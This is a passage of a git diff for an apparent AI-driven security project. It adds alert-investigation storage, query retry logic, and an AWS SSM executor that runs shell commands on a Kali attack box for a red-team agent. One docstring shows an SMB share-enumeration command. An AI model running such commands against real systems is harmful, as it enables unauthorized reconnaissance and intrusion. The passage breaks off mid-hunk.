SELECT AVG(CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0)) + as avg_evidence_rate FROM query_effectiveness + WHERE total_executions >= 3 + """ + ) + avg_query_evidence_rate = cursor.fetchone()["avg_evidence_rate"] or 0 + + # True positive rate (if labeled) + cursor.execute( + """ + SELECT + COUNT(CASE WHEN is_true_positive = 1 THEN 1 END) as true_positives, + COUNT(CASE WHEN is_true_positive = 0 THEN 1 END) as false_positives, + COUNT(CASE WHEN is_true_positive IS NOT NULL THEN 1 END) as labeled + FROM investigations + """ + ) + tp_row = cursor.fetchone() + true_positives = tp_row["true_positives"] + false_positives = tp_row["false_positives"] + labeled = tp_row["labeled"] + + tp_rate = true_positives / labeled if labeled > 0 else None + + return { + "total_investigations": total_investigations, + "status_distribution": status_counts, + "avg_evidence_count": round(avg_evidence, 1), + "avg_pyramid_level": round(avg_pyramid, 1), + "avg_duration_seconds": round(avg_duration, 1), + "total_query_patterns": total_queries, + "avg_query_evidence_rate": round(avg_query_evidence_rate * 100, 1) + if avg_query_evidence_rate + else 0, + "labeling": { + "true_positives": true_positives, + "false_positives": false_positives, + "unlabeled": total_investigations - labeled, + "true_positive_rate": round(tp_rate * 100, 1) if tp_rate is not None else None, + }, + } + + def label_investigation( + self, + investigation_id: str, + is_true_positive: bool, + analyst_notes: str | None = None, + ) -> bool: + """Label an investigation as true/false positive. + + Args: + investigation_id: Investigation to label + is_true_positive: Whether it was a true positive + analyst_notes: Optional analyst notes + + Returns: + True if updated, False if investigation not found + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute( + self.SQL_UPDATE_LABEL, + (1 if is_true_positive else 0, analyst_notes, investigation_id), + ) + conn.commit() + + if cursor.rowcount > 0: + logger.info( + f"Labeled investigation {investigation_id} as " + f"{'true' if is_true_positive else 'false'} positive" + ) + return True + return False + + def get_false_positive_patterns(self, min_occurrences: int = 3) -> list[dict[str, Any]]: + """Get patterns from known false positives. + + Args: + min_occurrences: Minimum occurrences to consider a pattern + + Returns: + List of false positive patterns + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_FALSE_POSITIVE_PATTERNS, (min_occurrences,)) + + return [ + { + "alert_name": row["alert_name"], + "fingerprint": row["alert_fingerprint"], + "technique_id": row["technique_id"], + "occurrences": row["occurrences"], + "avg_evidence": round(row["avg_evidence"], 1), + "recommendation": "Consider tuning this alert rule", + } + for row in cursor.fetchall() + ] + + +def create_stored_investigation_from_state( + state: InvestigationState, + status: str, +) -> StoredInvestigation: + """Create a StoredInvestigation from InvestigationState. + + Args: + state: Investigation state object + status: Final status (completed, escalated, timeout, failed) + + Returns: + StoredInvestigation ready for persistence + """ + + now = datetime.now(timezone.utc) + + # Generate alert fingerprint from labels + labels = state.alert.get("labels", {}) + fingerprint = labels.get("__alert_rule_uid__") or labels.get("alertname", "unknown") + + queries = state.executed_queries + if queries: + successful = sum(1 for q in queries if q.get("result_count", 0) > 0) + query_success_rate = successful / len(queries) + else: + query_success_rate = 0.0 + + effective_queries = [ + q.get("query", "") for q in queries if q.get("result_count", 0) > 0 and q.get("query") + ] + + technique_id = None + technique_name = None + if state.identified_techniques: + technique_id = next(iter(state.identified_techniques)) + technique_name = state.technique_names.get(technique_id) + + return StoredInvestigation( + investigation_id=state.investigation_id, + alert_name=labels.get("alertname", "unknown"), + alert_fingerprint=fingerprint, + severity=labels.get("severity", "unknown"), + technique_id=technique_id, + technique_name=technique_name, + started_at=state.started_at, + completed_at=now, + duration_seconds=(now - state.started_at).total_seconds(), + status=status, + evidence_count=len(state.evidence), + highest_pyramid_level=state.highest_pyramid_level, + techniques_identified=list(state.identified_techniques), + queries_executed=queries, + query_success_rate=query_success_rate, + effective_queries=effective_queries, + metadata={ + "escalated": state.escalated, + "escalation_reason": state.escalation_reason, + "hosts_investigated": list(state.queried_hosts), + "users_investigated": list(state.queried_users), + }, + ) + + +# Global store instance +_store: InvestigationStore | None = None + + +def get_investigation_store(db_path: Path | str | None = None) -> InvestigationStore: + """Get or create the global investigation store. + + Args: + db_path: Path to database file (default: ~/.ares/investigations.db) + + Returns: + InvestigationStore instance + """ + global _store + + if _store is None: + if db_path is None: + db_path = Path.home() / ".ares" / "investigations.db" + _store = InvestigationStore(db_path) + + return _store + + +def reset_investigation_store() -> None: + """Reset the global store (for testing).""" + global _store + _store = None diff --git a/src/ares/core/query_resilience.py b/src/ares/core/query_resilience.py new file mode 100644 index 00000000..32944b99 --- /dev/null +++ b/src/ares/core/query_resilience.py @@ -0,0 +1,402 @@ +""" +Query resilience module for handling timeouts and retries. + +Provides automatic time range reduction, retry with backoff, +and query chunking for large time ranges. +""" + +import asyncio +from collections.abc import Callable +from dataclasses import dataclass, field +from datetime import datetime, timedelta, timezone +from typing import Any, ClassVar + +import dreadnode as dn +from loguru import logger + + +@dataclass +class QueryAttempt: + """Record of a query attempt.""" + + query: str + start_time: str + end_time: str + attempt_number: int + success: bool + error: str | None = None + result_count: int = 0 + duration_ms: int = 0 + + +@dataclass +class QueryStats: + """Statistics for query execution.""" + + total_attempts: int = 0 + successful_attempts: int = 0 + timeout_count: int = 0 + retry_count: int = 0 + time_range_reductions: int = 0 + attempts: list[QueryAttempt] = field(default_factory=list) + + @property + def success_rate(self) -> float: + if self.total_attempts == 0: + return 0.0 + return self.successful_attempts / self.total_attempts + + +class QueryResilientExecutor: + """Executes queries with automatic retry and time range reduction. + + Features: + - Automatic time range reduction on timeout + - Exponential backoff for retries + - Query chunking for large time ranges + - Statistics tracking for monitoring + """ + + TIME_RANGE_FACTORS: ClassVar[list[float]] = [1.0, 0.5, 0.25, 0.1] + BACKOFF_DELAYS: ClassVar[list[int]] = [1, 2, 4] + + def __init__( + self, + max_retries: int = 3, + initial_timeout: float = 30.0, + enable_chunking: bool = True, + chunk_size_minutes: int = 30, + ): + """Initialize the resilient executor. + + Args: + max_retries: Maximum number of retry attempts + initial_timeout: Initial timeout in seconds + enable_chunking: Whether to enable query chunking for large ranges + chunk_size_minutes: Size of each chunk in minutes + """ + self.max_retries = max_retries + self.initial_timeout = initial_timeout + self.enable_chunking = enable_chunking + self.chunk_size_minutes = chunk_size_minutes + self.stats = QueryStats() + + async def execute_with_resilience( + self, + query_fn: Callable[..., Any], + query: str, + start_time: str, + end_time: str, + **kwargs: Any, + ) -> dict[str, Any]: + """Execute a query with automatic retry and time range reduction. + + Args: + query_fn: The async query function to call + query: The query string (LogQL or PromQL) + start_time: ISO8601 start timestamp + end_time: ISO8601 end timestamp + **kwargs: Additional arguments for the query function + + Returns: + Query result dict with additional metadata about retries + """ + start_dt = datetime.fromisoformat(start_time.replace("Z", "+00:00")) + end_dt = datetime.fromisoformat(end_time.replace("Z", "+00:00")) + original_range = end_dt - start_dt + + if self.enable_chunking and original_range > timedelta(hours=2): + logger.info(f"Query range ({original_range}) exceeds 2h, using chunked execution") + return await self._execute_chunked(query_fn, query, start_dt, end_dt, **kwargs) + + # Try with progressively smaller time ranges + last_error = None + for _factor_idx, factor in enumerate(self.TIME_RANGE_FACTORS): + if factor < 1.0: + self.stats.time_range_reductions += 1 + + # Calculate reduced time range (centered on end time since recent data is usually more relevant) + reduced_range = original_range * factor + new_start = end_dt - reduced_range + new_start_str = new_start.isoformat().replace("+00:00", "Z") + new_end_str = end_dt.isoformat().replace("+00:00", "Z") + + if factor < 1.0: + logger.info( + f"Reducing time range to {factor * 100:.0f}% ({reduced_range}) for retry" + ) + + # Try with retries at this time range + for attempt in range(self.max_retries): + self.stats.total_attempts += 1 + attempt_start = datetime.now(timezone.utc) + + try: + if attempt > 0: + self.stats.retry_count += 1 + delay = self.BACKOFF_DELAYS[min(attempt - 1, len(self.BACKOFF_DELAYS) - 1)] + logger.info( + f"Retry attempt {attempt + 1}/{self.max_retries} after {delay}s backoff" + ) + await asyncio.sleep(delay) + + # Execute the query with timeout + timeout = self.initial_timeout * ( + 1 + attempt * 0.5 + ) # Increase timeout on retries + result = await asyncio.wait_for( + query_fn( + logql=query, + start_time=new_start_str, + end_time=new_end_str, + **kwargs, + ), + timeout=timeout, + ) + + if isinstance(result, dict) and result.get("status") == "error": + error_msg = result.get("error", "Unknown error") + if "timeout" in error_msg.lower() or "deadline" in error_msg.lower(): + self.stats.timeout_count += 1 + last_error = error_msg + logger.warning(f"Query timeout: {error_msg}") + continue # Try next retry + # Other errors, still return but log + logger.warning(f"Query error (non-timeout): {error_msg}") + + # Success! + self.stats.successful_attempts += 1 + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + + # Record attempt + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=True, + result_count=self._count_results(result), + duration_ms=duration_ms, + ) + ) + + if isinstance(result, dict): + result["_resilience_metadata"] = { + "original_start": start_time, + "original_end": end_time, + "actual_start": new_start_str, + "actual_end": new_end_str, + "time_range_factor": factor, + "retry_count": attempt, + "time_range_reduced": factor < 1.0, + } + + dn.log_metric("query_success", 1, mode="count") + return result + + except asyncio.TimeoutError: + self.stats.timeout_count += 1 + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + last_error = f"Timeout after {timeout}s" + logger.warning(f"Query timed out after {timeout}s (attempt {attempt + 1})") + + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=False, + error=last_error, + duration_ms=duration_ms, + ) + ) + + except Exception as e: + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + last_error = str(e) + logger.error(f"Query failed: {e}") + + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=False, + error=last_error, + duration_ms=duration_ms, + ) + ) + + # Check for gRPC errors (non-retryable in most cases) + if "grpc" in str(e).lower(): + break # Move to next time range factor + + # All attempts failed + dn.log_metric("query_all_retries_failed", 1, mode="count") + logger.error(f"All query attempts failed after {self.stats.total_attempts} attempts") + + return { + "status": "error", + "error": f"Query failed after all retries. Last error: {last_error}", + "_resilience_metadata": { + "total_attempts": self.stats.total_attempts, + "timeout_count": self.stats.timeout_count, + "time_range_reductions": self.stats.time_range_reductions, + "final_time_range_factor": self.TIME_RANGE_FACTORS[-1], + }, + "suggestion": ( + "The query consistently times out. Try:\n" + "1. Use more specific label filters to reduce data volume\n" + "2. Query a shorter time range manually\n" + "3. Simplify the regex patterns in the query" + ), + } + + async def _execute_chunked( + self, + query_fn: Callable[..., Any], + query: str, + start_dt: datetime, + end_dt: datetime, + **kwargs: Any, + ) -> dict[str, Any]: + """Execute a query in chunks and merge results. + + Args: + query_fn: The async query function + query: The query string + start_dt: Start datetime + end_dt: End datetime + **kwargs: Additional query arguments + + Returns: + Merged results from all chunks + """ + chunk_delta = timedelta(minutes=self.chunk_size_minutes) + chunks = [] + current_start = start_dt + + while current_start < end_dt: + current_end = min(current_start + chunk_delta, end_dt) + chunks.append((current_start, current_end)) + current_start = current_end + + logger.info(f"Executing query in {len(chunks)} chunks of {self.chunk_size_minutes}min each") + + all_results = [] + failed_chunks = [] + + for i, (chunk_start, chunk_end) in enumerate(chunks): + logger.debug(f"Executing chunk {i + 1}/{len(chunks)}") + + chunk_result = await self.execute_with_resilience( + query_fn, + query, + chunk_start.isoformat().replace("+00:00", "Z"), + chunk_end.isoformat().replace("+00:00", "Z"), + **kwargs, + ) + + if isinstance(chunk_result, dict) and chunk_result.get("status") == "error": + failed_chunks.append(i) + logger.warning(f"Chunk {i + 1} failed: {chunk_result.get('error')}") + else: + all_results.append(chunk_result) + + # Merge results + merged = self._merge_chunk_results(all_results) + + if isinstance(merged, dict): + merged["_chunked_execution"] = { + "total_chunks": len(chunks), + "successful_chunks": len(all_results), + "failed_chunks": len(failed_chunks), + "chunk_size_minutes": self.chunk_size_minutes, + } + + if failed_chunks: + logger.warning(f"{len(failed_chunks)}/{len(chunks)} chunks failed") + + return merged + + def _merge_chunk_results(self, results: list[dict[str, Any]]) -> dict[str, Any]: + """Merge results from multiple chunks. + + Args: + results: List of query results from chunks + + Returns: + Merged result dict + """ + if not results: + return {"status": "success", "data": {"result": []}} + + # For Loki-style results, merge the streams + merged_streams = [] + for result in results: + if isinstance(result, dict): + data = result.get("data", {}) + streams = data.get("result", []) + merged_streams.extend(streams) + + return { + "status": "success", + "data": {"result": merged_streams}, + } + + def _count_results(self, result: Any) -> int: + """Count the number of results in a query response.""" + if isinstance(result, list): + return len(result) + if isinstance(result, dict): + data = result.get("data", {}) + streams = data.get("result", []) + if isinstance(streams, list): + total = 0 + for stream in streams: + values = stream.get("values", []) + total += len(values) if isinstance(values, list) else 0 + return total + return 0 + + def get_stats_summary(self) -> dict[str, Any]: + """Get a summary of query statistics. + + Returns: + Dict with query execution statistics + """ + return { + "total_attempts": self.stats.total_attempts, + "successful_attempts": self.stats.successful_attempts, + "success_rate": f"{self.stats.success_rate * 100:.1f}%", + "timeout_count": self.stats.timeout_count, + "retry_count": self.stats.retry_count, + "time_range_reductions": self.stats.time_range_reductions, + } + + +# Singleton instance for global use +_resilient_executor: QueryResilientExecutor | None = None + + +def get_resilient_executor() -> QueryResilientExecutor: + """Get or create the global resilient executor instance.""" + global _resilient_executor + if _resilient_executor is None: + _resilient_executor = QueryResilientExecutor() + return _resilient_executor + + +def reset_resilient_executor() -> None: + """Reset the global executor (for testing or new investigations).""" + global _resilient_executor + _resilient_executor = None diff --git a/src/ares/core/remote.py b/src/ares/core/remote.py new file mode 100644 index 00000000..51c278fd --- /dev/null +++ b/src/ares/core/remote.py @@ -0,0 +1,407 @@ +"""Remote command execution via AWS SSM. + +This module provides functionality to execute commands on remote EC2 instances +(specifically the Kali attack box) using AWS Systems Manager (SSM). +""" + +import os +import time +from dataclasses import dataclass +from typing import Any, NoReturn + +import boto3 +from botocore.exceptions import ClientError, SSOTokenLoadError, TokenRetrievalError +from loguru import logger + + +class SSOTokenExpiredError(Exception): + """Raised when AWS SSO token has expired and needs refresh.""" + + +@dataclass +class CommandResult: + """Result of a remote command execution.""" + + stdout: str + stderr: str + return_code: int + success: bool + + @property + def output(self) -> str: + """Combined stdout and stderr output.""" + if self.stderr: + return f"{self.stdout}\n{self.stderr}" + return self.stdout + + +class SSMExecutor: + """Execute commands on remote EC2 instances via AWS SSM. + + This class handles command execution on the Kali attack box using + AWS Systems Manager send-command API. + + Attributes: + instance_id: EC2 instance ID of the target (Kali box) + profile: AWS profile name for authentication + region: AWS region + """ + + def __init__( + self, + instance_id: str | None = None, + instance_name: str | None = None, + profile: str = "lab", + region: str = "us-west-1", + ): + """Initialize the SSM executor. + + Args: + instance_id: EC2 instance ID (if known) + instance_name: EC2 instance Name tag to resolve to instance ID + profile: AWS profile name + region: AWS region + """ + self.profile = profile + self.region = region + self._instance_id = instance_id + self._instance_name = instance_name or os.environ.get( + "ARES_KALI_INSTANCE", "staging-alpha-operator-range-kali" + ) + self._ssm_client: Any = None + self._ec2_client: Any = None + + def _create_session(self) -> boto3.Session: + """Create a boto3 session, validating SSO token first.""" + try: + session = boto3.Session(profile_name=self.profile, region_name=self.region) + # Force credential resolution to catch SSO errors early + credentials = session.get_credentials() + if credentials is None: + raise SSOTokenExpiredError( # noqa: TRY301 + f"No credentials available for profile '{self.profile}'. " + f"Run: aws sso login --profile {self.profile}" + ) + # Try to actually use the credentials to validate them + credentials.get_frozen_credentials() + return session + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except Exception as e: + if "token" in str(e).lower() and ( + "expired" in str(e).lower() or "sso" in str(e).lower() + ): + self._handle_sso_error(e) + raise + + def _handle_sso_error(self, original_error: Exception) -> NoReturn: + """Handle SSO token errors with helpful message and optional auto-refresh.""" + error_msg = ( + f"\n{'=' * 60}\n" + f"AWS SSO TOKEN EXPIRED\n" + f"{'=' * 60}\n" + f"Your AWS SSO session has expired.\n\n" + f"To fix this, run:\n" + f" aws sso login --profile {self.profile}\n\n" + f"Original error: {original_error}\n" + f"{'=' * 60}\n" + ) + logger.error(error_msg) + + # Clear cached clients so next attempt will re-authenticate + self._invalidate_clients() + + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{self.profile}'. " + f"Run: aws sso login --profile {self.profile}" + ) from original_error + + def _invalidate_clients(self) -> None: + """Clear cached clients to force re-authentication on next use.""" + self._ssm_client = None + self._ec2_client = None + self._instance_id = None + + @property + def ssm_client(self) -> Any: + """Lazy-load SSM client with SSO token validation.""" + if self._ssm_client is None: + session = self._create_session() + self._ssm_client = session.client("ssm") + return self._ssm_client + + @property + def ec2_client(self) -> Any: + """Lazy-load EC2 client with SSO token validation.""" + if self._ec2_client is None: + session = self._create_session() + self._ec2_client = session.client("ec2") + return self._ec2_client + + @property + def instance_id(self) -> str: + """Resolve and return the instance ID.""" + if self._instance_id is None: + self._instance_id = self._resolve_instance_id() + return self._instance_id + + def _resolve_instance_id(self) -> str: + """Resolve instance name to instance ID via EC2 API.""" + try: + response = self.ec2_client.describe_instances( + Filters=[ + {"Name": "tag:Name", "Values": [self._instance_name]}, + {"Name": "instance-state-name", "Values": ["running"]}, + ] + ) + + for reservation in response.get("Reservations", []): + for instance in reservation.get("Instances", []): + instance_id = instance.get("InstanceId") + if instance_id: + logger.info( + f"Resolved Kali instance '{self._instance_name}' to {instance_id}" + ) + return instance_id + + raise RuntimeError(f"No running instance found with name '{self._instance_name}'") # noqa: TRY301 + + except SSOTokenExpiredError: + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise RuntimeError(f"Failed to resolve instance ID: {e}") from e + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + def run_command( + self, + command: str | list[str], + timeout_seconds: int = 300, + working_directory: str = "/tmp", # noqa: S108 # nosec B108 + ) -> CommandResult: + """Execute a command on the remote instance via SSM. + + Args: + command: Command string or list of command parts + timeout_seconds: Maximum time to wait for command completion + working_directory: Directory to execute command in + + Returns: + CommandResult with stdout, stderr, and return code + """ + command_str = " ".join(command) if isinstance(command, list) else command + + # Wrap command to capture exit code and handle errors + wrapped_command = f""" +cd {working_directory} +{command_str} +EXIT_CODE=$? +exit $EXIT_CODE +""" + + try: + logger.debug(f"SSM executing: {command_str[:100]}...") + + response = self.ssm_client.send_command( + InstanceIds=[self.instance_id], + DocumentName="AWS-RunShellScript", + Parameters={"commands": [wrapped_command]}, + TimeoutSeconds=timeout_seconds, + ) + + command_id = response["Command"]["CommandId"] + logger.debug(f"SSM command ID: {command_id}") + + # Wait for command to complete + return self._wait_for_command(command_id, timeout_seconds) + + except SSOTokenExpiredError: + # Re-raise SSO errors without wrapping + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + error_msg = f"SSM command failed: {e}" + logger.error(error_msg) + return CommandResult( + stdout="", + stderr=error_msg, + return_code=1, + success=False, + ) + except Exception as e: + # Catch any other SSO-related errors + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + def _wait_for_command( + self, + command_id: str, + timeout_seconds: int, + ) -> CommandResult: + """Wait for SSM command to complete and return result.""" + start_time = time.time() + poll_interval = 2 # seconds + + while True: + elapsed = time.time() - start_time + if elapsed > timeout_seconds: + return CommandResult( + stdout="", + stderr=f"Command timed out after {timeout_seconds} seconds", + return_code=124, + success=False, + ) + + try: + response = self.ssm_client.get_command_invocation( + CommandId=command_id, + InstanceId=self.instance_id, + ) + + status = response.get("Status", "") + + if status in ("Success", "Failed", "Cancelled", "TimedOut"): + stdout = response.get("StandardOutputContent", "") + stderr = response.get("StandardErrorContent", "") + return_code = response.get("ResponseCode", -1) + + # Handle None return code + if return_code is None: + return_code = 0 if status == "Success" else 1 + + success = status == "Success" and return_code == 0 + + logger.debug( + f"SSM command completed: status={status}, return_code={return_code}" + ) + + return CommandResult( + stdout=stdout, + stderr=stderr, + return_code=return_code, + success=success, + ) + + # Still pending, wait and retry + time.sleep(poll_interval) + + except SSOTokenExpiredError: + raise + except (TokenRetrievalError, SSOTokenLoadError) as e: + self._handle_sso_error(e) + except ClientError as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + if "InvocationDoesNotExist" in str(e): + # Command not yet visible, wait and retry + time.sleep(poll_interval) + continue + raise + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + self._handle_sso_error(e) + raise + + +# Global executor instance (lazy-loaded) +_executor: SSMExecutor | None = None + + +def get_executor() -> SSMExecutor: + """Get or create the global SSM executor instance.""" + global _executor + if _executor is None: + _executor = SSMExecutor() + return _executor + + +def validate_sso_credentials(profile: str = "lab") -> bool: + """Validate that SSO credentials are available and not expired. + + Call this at the start of an operation to fail fast if credentials + are invalid, rather than failing mid-operation. + + Args: + profile: AWS profile name to validate + + Returns: + True if credentials are valid + + Raises: + SSOTokenExpiredError: If SSO token is expired or invalid + """ + try: + session = boto3.Session(profile_name=profile) + credentials = session.get_credentials() + if credentials is None: + raise SSOTokenExpiredError( # noqa: TRY301 + f"No credentials available for profile '{profile}'. " + f"Run: aws sso login --profile {profile}" + ) + # Force credential resolution to validate token + credentials.get_frozen_credentials() + logger.debug(f"SSO credentials validated for profile '{profile}'") + return True + except (TokenRetrievalError, SSOTokenLoadError) as e: + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{profile}'. Run: aws sso login --profile {profile}" + ) from e + except Exception as e: + error_str = str(e).lower() + if "token" in error_str and ("expired" in error_str or "sso" in error_str): + raise SSOTokenExpiredError( + f"AWS SSO token expired for profile '{profile}'. " + f"Run: aws sso login --profile {profile}" + ) from e + raise + + +def reset_executor() -> None: + """Reset the global executor instance. + + Call this after SSO token refresh to force re-authentication. + """ + global _executor + _executor = None + logger.info("SSM executor reset - will re-authenticate on next use") + + +def run_remote( + command: str | list[str], + timeout_seconds: int = 300, + working_directory: str = "/tmp", # noqa: S108 # nosec B108 +) -> CommandResult: + """Execute a command on the remote Kali instance. + + This is a convenience function that uses the global executor. + + Args: + command: Command string or list of command parts + timeout_seconds: Maximum time to wait + working_directory: Directory to execute in + + Returns: + CommandResult with stdout, stderr, and return code + + Example: + >>> result = run_remote("netexec smb 10.1.2.219 --shares") + >>> print(result.stdout) + """ + executor = get_executor() + return executor.run_command(command, timeout_seconds, working_directory) diff --git a/src/ares/integrations/mitre.py b/src/ares/integrations/mitre.py index 46c7ea70..e3fef207 100644 --- a/src/ares/integrations/mitre.py +++ b/src/ares/integrations/mitre.py @@ -103,7 +103,6 @@ async def load(self) -> None: response.raise_for_status() bundle = response.json() - # Parse STIX objects for obj in bundle.get("objects", []): obj_type = obj.get("type") @@ -131,12 +130,10 @@ def _parse_technique(self, obj: dict) -> None: if not technique_id: return - # Get tactic from kill chain kill_chain = obj.get("kill_chain_phases", []) tactic_shortname = kill_chain[0]["phase_name"] if kill_chain else "unknown" tactic_id = self.TACTIC_MAP.get(tactic_shortname, "") - # Check if subtechnique is_subtechnique = obj.get("x_mitre_is_subtechnique", False) parent = None if is_subtechnique and "." in technique_id: diff --git a/src/ares/main.py b/src/ares/main.py index b5071740..eb452fa5 100644 --- a/src/ares/main.py +++ b/src/ares/main.py @@ -87,7 +87,6 @@ async def main( args = args or Args() dn_args = dn_args or DreadnodeArgs() - # Get API keys from environment if not provided grafana_api_key = args.grafana_api_key or os.getenv("GRAFANA_API_KEY", "") dreadnode_token = dn_args.token or os.getenv("DREADNODE_API_KEY", "") @@ -116,7 +115,6 @@ async def main( from ares.integrations.mitre import MITREAttackClient from ares.tools.blue import GrafanaTools - # Initialize MITRE client logger.info("Loading MITRE ATT&CK data from STIX repository...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -129,7 +127,6 @@ async def main( report_dir.mkdir(parents=True, exist_ok=True) logger.info(f"Reports: {report_dir}") - # Initialize orchestrator orchestrator = InvestigationOrchestrator( model=args.model, grafana_url=args.grafana_url, @@ -139,7 +136,6 @@ async def main( max_steps=args.max_steps, ) - # Initialize Grafana client for polling grafana = GrafanaTools( base_url=args.grafana_url, api_key=grafana_api_key, @@ -158,7 +154,6 @@ async def main( try: while True: try: - # Poll for firing alerts alerts = await grafana.get_firing_alerts() for alert in alerts: @@ -195,7 +190,6 @@ async def main( except Exception as e: logger.error(f"Investigation failed: {e}") - dn.log_metric("investigation_failed", 1, mode="count") # If running in once mode, exit after processing current alerts if args.once: @@ -245,7 +239,6 @@ async def investigate_alert( args = args or Args() dn_args = dn_args or DreadnodeArgs() - # Parse alert if alert_json.startswith("{"): alert = json.loads(alert_json) else: @@ -267,7 +260,6 @@ async def investigate_alert( from ares.agents.blue import InvestigationOrchestrator from ares.integrations.mitre import MITREAttackClient - # Load MITRE data logger.info("Loading MITRE ATT&CK data...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -351,7 +343,6 @@ async def redteam( from ares.agents.red import RedTeamOrchestrator from ares.integrations.mitre import MITREAttackClient - # Load MITRE data logger.info("Loading MITRE ATT&CK data...") mitre_client = MITREAttackClient() await mitre_client.load() @@ -364,7 +355,6 @@ async def redteam( report_dir.mkdir(parents=True, exist_ok=True) logger.info(f"Reports: {report_dir}") - # Create orchestrator orchestrator = RedTeamOrchestrator( model=args.model, mitre_client=mitre_client, diff --git a/src/ares/reports/redteam.py b/src/ares/reports/redteam.py index 507cce05..3d31e3e0 100644 --- a/src/ares/reports/redteam.py +++ b/src/ares/reports/redteam.py @@ -30,11 +30,9 @@ def generate(self, state: RedTeamState) -> str: Returns: Complete markdown report as a string. """ - # Calculate duration duration = datetime.now(timezone.utc) - state.started_at - duration_str = str(duration).split(".")[0] # Remove microseconds + duration_str = str(duration).split(".")[0] - # Generate executive summary executive_summary = self._generate_executive_summary(state) # Render the report using the template diff --git a/src/ares/tools/blue/__init__.py b/src/ares/tools/blue/__init__.py index ccbf7e4e..52b04b47 100644 --- a/src/ares/tools/blue/__init__.py +++ b/src/ares/tools/blue/__init__.py @@ -3,14 +3,18 @@ from ares.tools.blue.actions import CompletionTools, escalate_investigation from ares.tools.blue.grafana import GrafanaTools, connect_grafana_mcp from ares.tools.blue.investigation import InvestigationTools, QuestionEngineTools +from ares.tools.blue.learning import LearningTools from ares.tools.blue.observability import LokiTools, PrometheusTools +from ares.tools.blue.query_templates import QueryTemplateTools __all__ = [ "CompletionTools", "GrafanaTools", "InvestigationTools", + "LearningTools", "LokiTools", "PrometheusTools", + "QueryTemplateTools", "QuestionEngineTools", "connect_grafana_mcp", "escalate_investigation", diff --git a/src/ares/tools/blue/actions.py b/src/ares/tools/blue/actions.py index c9ff3711..d053ee93 100644 --- a/src/ares/tools/blue/actions.py +++ b/src/ares/tools/blue/actions.py @@ -26,130 +26,139 @@ def set_state(self, state: InvestigationState): async def complete_investigation( self, summary: str, - attack_synopsis: str, - recommendations: list[str], - confidence: str, - affected_hosts: list[str], - affected_users: list[str], - attack_timeframe: str, + attack_synopsis: str | None = None, + recommendations: list[str] | None = None, ) -> str: """Complete the investigation and signal report generation. - REQUIRED before calling: - 1. Must have transitioned through lateral stage - 2. Must have investigated at least one host - 3. Must provide specific affected hosts/users - 4. Must provide attack timeframe + Call this when you have: + - Answered the key questions about the alert + - Recorded evidence for your findings + - Built a timeline of events + - Identified affected hosts/users Args: - summary: Executive summary (2-3 sentences). - attack_synopsis: Detailed description of the attack chain. - recommendations: List of recommended actions. - confidence: Overall confidence level (high/medium/low with explanation). - affected_hosts: List of hosts involved in the attack (IPs or hostnames). - affected_users: List of user accounts involved. - attack_timeframe: Time range of the attack (e.g., "2024-01-15 14:30-15:45 UTC"). + summary: Executive summary of the investigation including: + - What attack/activity was detected + - Key findings and evidence + - Affected hosts and users + - Confidence level (high/medium/low) + attack_synopsis: Narrative describing the attack chain chronologically. + Should include specific hostnames, usernames, IPs, and timestamps. + Explains how the attacker progressed through the attack. + recommendations: List of recommended actions to take. Should include + both immediate response actions and long-term improvements. + Check the alert's 'response' annotation for expert guidance. Returns: - Confirmation message or error if validation fails. + Confirmation message. Example: >>> await complete_investigation( - ... summary="Detected Kerberoasting attack targeting service accounts.", - ... attack_synopsis="Attacker performed AS-REP roasting against samwell.tarly...", - ... recommendations=["Reset passwords for samwell.tarly and jeor.mormont"], - ... confidence="High - Multiple corroborating Kerberos events", - ... affected_hosts=["10.0.4.186", "WINTERFELL.north.sevenkingdoms.local"], - ... affected_users=["samwell.tarly", "jeor.mormont"], - ... attack_timeframe="2024-01-08 04:37-04:43 UTC" + ... summary="Detected Kerberoasting attack targeting service accounts. " + ... "User samwell.tarly requested TGS tickets with RC4 encryption " + ... "for multiple SPNs from host 10.0.4.186. Confidence: High.", + ... attack_synopsis="At 14:30 UTC, user samwell.tarly from 10.0.4.186 " + ... "began requesting TGS tickets for service accounts. " + ... "12 tickets requested with RC4 encryption over 5 minutes.", + ... recommendations=[ + ... "Reset service account passwords immediately", + ... "Enable AES-only Kerberos encryption", + ... "Review service account permissions" + ... ] ... ) 'Investigation completed. Report will be generated.' """ - errors = [] - - # Validate state exists if not self.state: return "ERROR: No investigation state. Cannot complete." - # Validate lateral investigation was performed + # Log stage info if self.state.stage.value not in ["lateral", "synthesis"]: - errors.append( - f"ERROR: Must reach 'lateral' stage before completion. " - f"Current stage: {self.state.stage.value}. " - f"Call transition_stage('lateral') after investigating 